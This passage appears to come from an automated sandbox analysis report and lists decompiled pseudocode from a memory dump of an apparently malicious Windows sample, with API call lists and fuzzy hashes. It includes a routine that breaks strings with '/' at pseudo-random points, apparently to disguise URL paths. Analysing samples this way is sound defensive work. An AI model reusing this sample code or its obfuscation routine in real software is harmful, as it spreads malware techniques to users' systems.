                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					return _t38;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(E04876C01(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t40 = CreateEventA(0x487d2a8, 1, 0,  *0x487d344);
                                                                                                                                                                                                                                                            				if(_t40 != 0) {
                                                                                                                                                                                                                                                            					SetEvent(_t40);
                                                                                                                                                                                                                                                            					Sleep(0xbb8);
                                                                                                                                                                                                                                                            					CloseHandle(_t40);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_push( &_v32);
                                                                                                                                                                                                                                                            				if(_a12 == 0) {
                                                                                                                                                                                                                                                            					_t29 = E048727B1(_t36);
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_t29 = E048718C1(_t36);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t41 = _v16;
                                                                                                                                                                                                                                                            				_t38 = _t29;
                                                                                                                                                                                                                                                            				if(_v16 != 0) {
                                                                                                                                                                                                                                                            					E0487A3B5(_t41);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t39 = _a8;
                                                                                                                                                                                                                                                            					_t38 = E048728C2( &_v32, _t39);
                                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                            0x048748cc
                                                                                                                                                                                                                                                            0x048748d9
                                                                                                                                                                                                                                                            0x048748df
                                                                                                                                                                                                                                                            0x048748e0
                                                                                                                                                                                                                                                            0x048748e1
                                                                                                                                                                                                                                                            0x048748e2
                                                                                                                                                                                                                                                            0x048748e3
                                                                                                                                                                                                                                                            0x048748e7
                                                                                                                                                                                                                                                            0x048748f3
                                                                                                                                                                                                                                                            0x048748f7
                                                                                                                                                                                                                                                            0x0487497f
                                                                                                                                                                                                                                                            0x0487497f
                                                                                                                                                                                                                                                            0x04874982
                                                                                                                                                                                                                                                            0x04874984
                                                                                                                                                                                                                                                            0x0487498c
                                                                                                                                                                                                                                                            0x0487498c
                                                                                                                                                                                                                                                            0x04874992
                                                                                                                                                                                                                                                            0x04874995
                                                                                                                                                                                                                                                            0x04874995
                                                                                                                                                                                                                                                            0x04874992
                                                                                                                                                                                                                                                            0x048749a0
                                                                                                                                                                                                                                                            0x048749a0
                                                                                                                                                                                                                                                            0x0487490a
                                                                                                                                                                                                                                                            0x0487490c
                                                                                                                                                                                                                                                            0x0487490c
                                                                                                                                                                                                                                                            0x04874923
                                                                                                                                                                                                                                                            0x04874927
                                                                                                                                                                                                                                                            0x0487492a
                                                                                                                                                                                                                                                            0x04874935
                                                                                                                                                                                                                                                            0x0487493c
                                                                                                                                                                                                                                                            0x0487493c
                                                                                                                                                                                                                                                            0x04874948
                                                                                                                                                                                                                                                            0x04874949
                                                                                                                                                                                                                                                            0x04874957
                                                                                                                                                                                                                                                            0x0487494b
                                                                                                                                                                                                                                                            0x0487494b
                                                                                                                                                                                                                                                            0x0487494c
                                                                                                                                                                                                                                                            0x0487494d
                                                                                                                                                                                                                                                            0x0487494e
                                                                                                                                                                                                                                                            0x0487494f
                                                                                                                                                                                                                                                            0x04874950
                                                                                                                                                                                                                                                            0x04874950
                                                                                                                                                                                                                                                            0x0487495c
                                                                                                                                                                                                                                                            0x04874961
                                                                                                                                                                                                                                                            0x04874963
                                                                                                                                                                                                                                                            0x04874965
                                                                                                                                                                                                                                                            0x04874965
                                                                                                                                                                                                                                                            0x0487496c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487496e
                                                                                                                                                                                                                                                            0x0487496e
                                                                                                                                                                                                                                                            0x0487497b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487497b

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(0487D2A8,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,048787D8,?,00000001,?), ref: 0487491D
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,048787D8,?,00000001,?,00000002,?,?,048791D2,?), ref: 0487492A
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,?,048787D8,?,00000001,?,00000002,?,?,048791D2,?), ref: 04874935
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,048787D8,?,00000001,?,00000002,?,?,048791D2,?), ref: 0487493C
                                                                                                                                                                                                                                                              • Part of subcall function 048727B1: WaitForSingleObject.KERNEL32(00000000,?,?,?,0487495C,?,0487495C,?,?,?,?,?,0487495C,?), ref: 0487288B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2559942907-0
                                                                                                                                                                                                                                                            • Opcode ID: 1b934086fccb1fb1821752d77f94f8984b0581744dfa53652044a92e6704ade0
                                                                                                                                                                                                                                                            • Instruction ID: b61f79b51729d109eeed021be3dcf44b85f3165b8f4eff43ad9e80ff6bd20b9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b934086fccb1fb1821752d77f94f8984b0581744dfa53652044a92e6704ade0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E21A733D00119ABDB11FFE888A49EEB3B9EF44754B044E25EA51E7150E774FD018BA1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                            			E048780EE(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                                            				signed short _t23;
                                                                                                                                                                                                                                                            				char* _t27;
                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                            				unsigned int _t33;
                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                            				unsigned int _t38;
                                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t42 = __eax;
                                                                                                                                                                                                                                                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                                                            				_t30 = RtlAllocateHeap( *0x487d238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                                            				_v12 = _t30;
                                                                                                                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                                                                                                                            					_v8 = _t42;
                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                            						_t33 = 0x18;
                                                                                                                                                                                                                                                            						if(_t38 <= _t33) {
                                                                                                                                                                                                                                                            							_t33 = _t38;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t21 =  *0x487d250; // 0xbec7a913
                                                                                                                                                                                                                                                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                                            						 *0x487d250 = _t23;
                                                                                                                                                                                                                                                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                                            						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                                            						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                                            						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                                            						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                                            						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                                            						 *_t27 = 0x2f;
                                                                                                                                                                                                                                                            						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                                            						_t30 = _t13;
                                                                                                                                                                                                                                                            					} while (_t38 > 8);
                                                                                                                                                                                                                                                            					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v12;
                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                            0x048780f6
                                                                                                                                                                                                                                                            0x048780f9
                                                                                                                                                                                                                                                            0x048780ff
                                                                                                                                                                                                                                                            0x04878117
                                                                                                                                                                                                                                                            0x0487811b
                                                                                                                                                                                                                                                            0x0487811e
                                                                                                                                                                                                                                                            0x04878120
                                                                                                                                                                                                                                                            0x04878123
                                                                                                                                                                                                                                                            0x04878125
                                                                                                                                                                                                                                                            0x04878128
                                                                                                                                                                                                                                                            0x0487812a
                                                                                                                                                                                                                                                            0x0487812a
                                                                                                                                                                                                                                                            0x0487812c
                                                                                                                                                                                                                                                            0x04878137
                                                                                                                                                                                                                                                            0x0487813c
                                                                                                                                                                                                                                                            0x0487814d
                                                                                                                                                                                                                                                            0x04878155
                                                                                                                                                                                                                                                            0x0487815a
                                                                                                                                                                                                                                                            0x0487815d
                                                                                                                                                                                                                                                            0x04878160
                                                                                                                                                                                                                                                            0x04878162
                                                                                                                                                                                                                                                            0x04878168
                                                                                                                                                                                                                                                            0x0487816b
                                                                                                                                                                                                                                                            0x0487816b
                                                                                                                                                                                                                                                            0x0487816b
                                                                                                                                                                                                                                                            0x04878176
                                                                                                                                                                                                                                                            0x0487817b
                                                                                                                                                                                                                                                            0x04878185

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04876B43,00000000,?,?,04878ED2,?,052595B0), ref: 048780F9
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04878111
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04876B43,00000000,?,?,04878ED2,?,052595B0), ref: 04878155
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000001,?,00000001), ref: 04878176
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1819133394-0
                                                                                                                                                                                                                                                            • Opcode ID: 46ba3982af574d4229a35782297389645d2d321b04055971628589b811123610
                                                                                                                                                                                                                                                            • Instruction ID: 33c0a4b01ba3adc8d186e4b2082cde26d1eb078bb8415886d1e0e867b3afbd30
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46ba3982af574d4229a35782297389645d2d321b04055971628589b811123610
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68112572A00114AFD710DF69DC98D9EBBEEEF806A0B044676F909D7250EB74EE04C7A0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                            			E0487781F(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                            				char* _t18;
                                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t19 = 0x27;
                                                                                                                                                                                                                                                            				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                                            				_t18 = 0;
                                                                                                                                                                                                                                                            				E048747B0(_t8, _t1);
                                                                                                                                                                                                                                                            				_t16 = E048716F8(_t19);
                                                                                                                                                                                                                                                            				if(_t16 != 0) {
                                                                                                                                                                                                                                                            					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                                            					_t13 = E04879F32(_t3, _t16, _a8);
                                                                                                                                                                                                                                                            					if(_a4 != 0) {
                                                                                                                                                                                                                                                            						__imp__(_a4);
                                                                                                                                                                                                                                                            						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t18 = E048716F8(_t19);
                                                                                                                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                                                                                                                            						 *_t18 = 0;
                                                                                                                                                                                                                                                            						if(_a4 != 0) {
                                                                                                                                                                                                                                                            							__imp__(_t18, _a4);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						__imp__(_t18, _t16);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E048770FF(_t16);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x0487782a
                                                                                                                                                                                                                                                            0x0487782b
                                                                                                                                                                                                                                                            0x0487782e
                                                                                                                                                                                                                                                            0x04877830
                                                                                                                                                                                                                                                            0x0487783b
                                                                                                                                                                                                                                                            0x0487783f
                                                                                                                                                                                                                                                            0x04877844
                                                                                                                                                                                                                                                            0x04877848
                                                                                                                                                                                                                                                            0x04877850
                                                                                                                                                                                                                                                            0x04877855
                                                                                                                                                                                                                                                            0x0487785d
                                                                                                                                                                                                                                                            0x0487785d
                                                                                                                                                                                                                                                            0x04877866
                                                                                                                                                                                                                                                            0x0487786a
                                                                                                                                                                                                                                                            0x04877870
                                                                                                                                                                                                                                                            0x04877873
                                                                                                                                                                                                                                                            0x04877879
                                                                                                                                                                                                                                                            0x04877879
                                                                                                                                                                                                                                                            0x04877881
                                                                                                                                                                                                                                                            0x04877881
                                                                                                                                                                                                                                                            0x04877888
                                                                                                                                                                                                                                                            0x04877888
                                                                                                                                                                                                                                                            0x04877893

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                              • Part of subcall function 04879F32: wsprintfA.USER32 ref: 04879F8E
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(048791A4,00000000,00000000,00000027,00000005,00000000,00000000,04877E27,74666F53,00000000,048791A4,0487D00C,?,048791A4), ref: 04877855
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04877879
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 04877881
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                            • String ID: Soft
                                                                                                                                                                                                                                                            • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                                            • Opcode ID: f0ee37782e0facd84a0b5e5f05e04ad72f46670fbc366ff2558514aa2c0777a0
                                                                                                                                                                                                                                                            • Instruction ID: e9fe94441ac56961704dbdf7c7de9cddd248dd662e261a5e704888ab42968943
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ee37782e0facd84a0b5e5f05e04ad72f46670fbc366ff2558514aa2c0777a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E01F732100105BBD7017BACDCA8EAE3B6CDF85649F044A20F904E6100D778E945C7E2
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E048785A3(void* __esi) {
                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                                                                                                            				memset(__esi, 0, 0x38);
                                                                                                                                                                                                                                                            				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                            				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                                                                                                                            					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                                            					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                                                                            					if(_t10 == 0) {
                                                                                                                                                                                                                                                            						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_v4 = 1;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v4;
                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                            0x048785ad
                                                                                                                                                                                                                                                            0x048785b1
                                                                                                                                                                                                                                                            0x048785c6
                                                                                                                                                                                                                                                            0x048785ca
                                                                                                                                                                                                                                                            0x048785cd
                                                                                                                                                                                                                                                            0x048785d3
                                                                                                                                                                                                                                                            0x048785d7
                                                                                                                                                                                                                                                            0x048785da
                                                                                                                                                                                                                                                            0x048785e5
                                                                                                                                                                                                                                                            0x048785dc
                                                                                                                                                                                                                                                            0x048785dc
                                                                                                                                                                                                                                                            0x048785dc
                                                                                                                                                                                                                                                            0x048785da
                                                                                                                                                                                                                                                            0x048785f3

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 048785B1
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 048785C6
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 048785D3
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 048785E5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2812548120-0
                                                                                                                                                                                                                                                            • Opcode ID: 568ecd4a55264e50cad4c00b939a2dcae73f9cf252a05df933ee63b4e6315f34
                                                                                                                                                                                                                                                            • Instruction ID: 62d8f0bfc906c6f653761d9d343a52ee2cd12493224da2edd5ba4495ea895aa6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 568ecd4a55264e50cad4c00b939a2dcae73f9cf252a05df933ee63b4e6315f34
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08F05EB010430CBFD310AF26DCD8C2BBBACFB45299B114E2DF046D2111D635E9058AB1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04877239() {
                                                                                                                                                                                                                                                            				void* _t1;
                                                                                                                                                                                                                                                            				intOrPtr _t5;
                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t1 =  *0x487d26c; // 0x2c4
                                                                                                                                                                                                                                                            				if(_t1 == 0) {
                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				SetEvent(_t1);
                                                                                                                                                                                                                                                            				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					SleepEx(0x64, 1);
                                                                                                                                                                                                                                                            					_t5 =  *0x487d2b4; // 0x0
                                                                                                                                                                                                                                                            					if(_t5 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                                            					if(_t11 > 0) {
                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t6 =  *0x487d26c; // 0x2c4
                                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t7 =  *0x487d238; // 0x4e60000
                                                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                                                            					HeapDestroy(_t7);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                            0x04877239
                                                                                                                                                                                                                                                            0x04877240
                                                                                                                                                                                                                                                            0x0487728a
                                                                                                                                                                                                                                                            0x0487728c
                                                                                                                                                                                                                                                            0x0487728c
                                                                                                                                                                                                                                                            0x04877244
                                                                                                                                                                                                                                                            0x0487724a
                                                                                                                                                                                                                                                            0x0487724f
                                                                                                                                                                                                                                                            0x04877253
                                                                                                                                                                                                                                                            0x04877259
                                                                                                                                                                                                                                                            0x04877260
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877262
                                                                                                                                                                                                                                                            0x04877267
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877267
                                                                                                                                                                                                                                                            0x04877269
                                                                                                                                                                                                                                                            0x04877271
                                                                                                                                                                                                                                                            0x04877274
                                                                                                                                                                                                                                                            0x04877274
                                                                                                                                                                                                                                                            0x0487727a
                                                                                                                                                                                                                                                            0x04877281
                                                                                                                                                                                                                                                            0x04877284
                                                                                                                                                                                                                                                            0x04877284
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(000002C4,00000001,04877EA0), ref: 04877244
                                                                                                                                                                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 04877253
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000002C4), ref: 04877274
                                                                                                                                                                                                                                                            • HeapDestroy.KERNEL32(04E60000), ref: 04877284
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4109453060-0
                                                                                                                                                                                                                                                            • Opcode ID: 37aa924ec00a8801d73a973542aeaaf03579effafcc43ebc16a398826b085328
                                                                                                                                                                                                                                                            • Instruction ID: 169285060b61bb3e667980d6ddfa5e9db80669ef53a210e6a27902c3429e3110
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37aa924ec00a8801d73a973542aeaaf03579effafcc43ebc16a398826b085328
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF030317253119BFB60AB75A96CB0677E8FF147527080E10BE12D7280EF29FC01DAA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                            			E048729B7(void** __esi) {
                                                                                                                                                                                                                                                            				char* _v0;
                                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                            				void** _t14;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t14 = __esi;
                                                                                                                                                                                                                                                            				_t4 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t6 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                                            					if( *_t1 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					Sleep(0xa);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t8 =  *_t14;
                                                                                                                                                                                                                                                            				if(_t8 != 0 && _t8 != 0x487d030) {
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _t8);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t14[1] = E04876A2E(_v0, _t14);
                                                                                                                                                                                                                                                            				_t11 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                                            				__imp__(_t12);
                                                                                                                                                                                                                                                            				return _t12;
                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                            0x048729b7
                                                                                                                                                                                                                                                            0x048729b7
                                                                                                                                                                                                                                                            0x048729c0
                                                                                                                                                                                                                                                            0x048729d0
                                                                                                                                                                                                                                                            0x048729d0
                                                                                                                                                                                                                                                            0x048729d5
                                                                                                                                                                                                                                                            0x048729da
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048729ca
                                                                                                                                                                                                                                                            0x048729ca
                                                                                                                                                                                                                                                            0x048729dc
                                                                                                                                                                                                                                                            0x048729e0
                                                                                                                                                                                                                                                            0x048729f2
                                                                                                                                                                                                                                                            0x048729f2
                                                                                                                                                                                                                                                            0x04872a02
                                                                                                                                                                                                                                                            0x04872a05
                                                                                                                                                                                                                                                            0x04872a0a
                                                                                                                                                                                                                                                            0x04872a0e
                                                                                                                                                                                                                                                            0x04872a14

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(05259570), ref: 048729C0
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,04879199), ref: 048729CA
